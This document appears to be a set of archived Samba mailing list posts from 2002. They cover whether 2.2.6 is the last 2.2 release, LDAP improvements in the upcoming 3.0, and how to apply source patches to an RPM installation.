John H Terpstra wrote: On Mon, 28 Oct 2002, William Jojo wrote: Just tought I'd follow up and see if 2.2.6 is truly the last release of samba_2_2 CVS branch. Yes, 2.2.6 is the latest stable release. So there will never be a stable samba again? ;) We hope that this will be our last update. All samba-team resources are now focussing on getting 3.0.0 readt for release. Right now 3.0.0 is still changing significantly and we would not recommend it's use in a production environment. We've got six systems running it with no visible issues. If it is not broken then why fix it? the last version I had problems with was 2.2.3a (on a SuSE system) and 2.2.4 (there were problems with LDAP, all solved since 2.2.5) I'm currently testing CVS from Sunday's pull of 3.0...is this the direction I should be heading? Yes. But do your home work. Test, test, test, and give us feedback. I'm currently working on a PDC for about 300 LDAP-based users, I guess with LDAP there is no problem when migrating to 3.0? Probably I'll run the actual CVS parallel regards -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Is 2.2.6 Final?
Andrew Bartlett wrote: Markus Schabel wrote: John H Terpstra wrote: On Mon, 28 Oct 2002, William Jojo wrote: Just tought I'd follow up and see if 2.2.6 is truly the last release of samba_2_2 CVS branch. Yes, 2.2.6 is the latest stable release. So there will never be a stable samba again? ;) :-) great, at least one realized that this was a joke ;) We hope that this will be our last update. All samba-team resources are now focussing on getting 3.0.0 readt for release. Right now 3.0.0 is still changing significantly and we would not recommend it's use in a production environment. We've got six systems running it with no visible issues. If it is not broken then why fix it? the last version I had problems with was 2.2.3a (on a SuSE system) and 2.2.4 (there were problems with LDAP, all solved since 2.2.5) I'm currently testing CVS from Sunday's pull of 3.0...is this the direction I should be heading? Yes. But do your home work. Test, test, test, and give us feedback. I'm currently working on a PDC for about 300 LDAP-based users, I guess with LDAP there is no problem when migrating to 3.0? Probably I'll run the actual CVS parallel Depending on how you also use LDAP, there are some good reasons to move to 3.0. In HEAD, pdb_ldap now has connection caching, and does not modify unchanged attributes (these benefits provided by metze, who has the significant advantage of using samba on a large and complex ldap infrastructure). I'm not sure if this is helpful when replicating the complete Directory to the Samba-Server, but at least it sounds good. We hope to move this stuff into the next 3.0 alpha. Samba 3.0 also adds 'ldap passwd sync', to help keep the LDAP and SMB passwords in sync. I guess that's really helpful for us. Do the computer accounts still need to be full posix users? It would simplify things a bit if not. regards Markus -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] samba latest release
Kovar Jan wrote: If you choose 2.2.5, then make sure you also add the patches at:- http://download.samba.org/samba/ftp/patches/jerry/post-2.2.5/ How do I apply those patches to binary samba installation from rpm? (Redhat 7.3, 2.4.18-10) You download the Sourcecode (or the tarball), patch it, compile it and generate a new rpm. rpm are binary packages, patches only apply to the sourcecode Thanks Jan Kovar -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba